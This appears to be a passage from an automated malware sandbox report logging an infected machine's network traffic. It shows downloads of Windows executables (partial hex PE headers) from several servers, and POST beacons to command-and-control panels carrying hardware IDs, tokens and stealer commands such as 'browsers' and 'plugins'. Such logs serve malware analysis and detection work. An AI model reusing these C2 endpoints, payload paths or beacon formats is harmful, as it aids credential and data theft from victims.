00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:54 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "6dde8-6288a270f12d2"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:55 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "1f3950-6288a27148177"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 
78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Mar 2025 07:10:57 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Upgrade: h2,h2c Last-Modified: Thu, 05 Dec 2024 18:34:46 GMT ETag: "3ef50-6288a27148177" Accept-Ranges: bytes X-Served-By: dugong.ydns.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Mar 2025 07:10:57 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Upgrade: h2,h2c Last-Modified: Thu, 05 Dec 2024 18:34:46 GMT ETag: "13bf0-6288a2718985b" Accept-Ranges: bytes X-Served-By: dugong.ydns.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:01 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:20:44 GMT ETag: "48e600-62fa681877911" Accept-Ranges: bytes Content-Length: 4777472 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Mar 2025 07:11:09 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Upgrade: h2,h2c Last-Modified: Thu, 05 Dec 2024 18:34:46 GMT ETag: "10e436-6288a2718791b" Accept-Ranges: bytes X-Served-By: dugong.ydns.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:09 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:25:53 GMT ETag: "1d4c00-62fa693f1c20c" Accept-Ranges: bytes Content-Length: 1920000 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 05:36:07 GMT ETag: "1cf600-62fa5e1f716bb" Accept-Ranges: bytes Content-Length: 1897984 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:25:53 GMT ETag: "1d4c00-62fa693f1c20c" Accept-Ranges: bytes Content-Length: 1920000 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:20 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:26:50 GMT ETag: "30bc00-62fa69759d0b7" Accept-Ranges: bytes Content-Length: 3193856 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:25:53 GMT ETag: "1d4c00-62fa693f1c20c" Accept-Ranges: bytes Content-Length: 1920000 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Mar 2025 07:11:31 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Upgrade: h2,h2c Last-Modified: Thu, 05 Dec 2024 18:34:45 GMT ETag: "a7550-6288a270bb76e" Accept-Ranges: bytes X-Served-By: dugong.ydns.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:11:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:27:18 GMT ETag: "1bb000-62fa69900a91a" Accept-Ranges: bytes Content-Length: 1814528 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Mar 2025 07:11:32 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Upgrade: h2,h2c Last-Modified: Thu, 05 Dec 2024 18:34:46 GMT ETag: "94750-6288a270e7691" Accept-Ranges: bytes X-Served-By: dugong.ydns.eu
                                                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: openresty | Date: Thu, 06 Mar 2025 07:11:33 GMT | Content-Type: application/x-msdos-program | Content-Length: 450024 | Connection: keep-alive | Upgrade: h2,h2c | Last-Modified: Thu, 05 Dec 2024 18:34:46 GMT | ETag: "6dde8-6288a270f12d2" | Accept-Ranges: bytes | X-Served-By: dugong.ydns.eu
                                                Source: global traffic | DNS traffic detected: number of DNS queries: 858
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 41 37 32 42 37 35 39 38 32 44 31 32 46 44 36 36 30 41 39 32 36 42 34 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB32A72B75982D12FD660A926B464F71F462AE478222FFDED0F8E1F939F
                                                Source: global traffic | HTTP traffic detected: GET /files/748049926/nhDLtPT.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 30 37 33 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10107310101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: GET /files/5149365135/ILqcVeT.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 30 39 34 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10109440101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: GET /files/koloples/vertualiziren.exe HTTP/1.1 | Host: 45.59.120.8
                                                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: dugong.ydns.eu | Connection: Keep-Alive | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /files/5149365135/rXOl0pp.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA | Host: dugong.ydns.eu | Content-Length: 213 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 31 45 34 41 34 45 36 36 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 61 66 66 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a | Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="hwid"491E4A4E66092653764225------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build"traff1------EBKEHJJDAAAAKECBGHDA--
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEG | Host: dugong.ydns.eu | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 2d 2d 0d 0a | Data Ascii: ------FBAKEHIEBKJJJJJKKKEGContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------FBAKEHIEBKJJJJJKKKEGContent-Disposition: form-data; name="message"browsers------FBAKEHIEBKJJJJJKKKEG--
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK | Host: dugong.ydns.eu | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a | Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"plugins------DAFBGHCAKKFCAKEBKJKK--
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD | Host: dugong.ydns.eu | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a | Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"fplugins------GIIIECBGDHJJKFIDAKJD--
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEG | Host: dugong.ydns.eu | Content-Length: 6487 | Connection: Keep-Alive | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 30 30 30 37 37 30 31 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10000770100&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 30 39 34 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10109490101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJE | Host: dugong.ydns.eu | Content-Length: 419 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 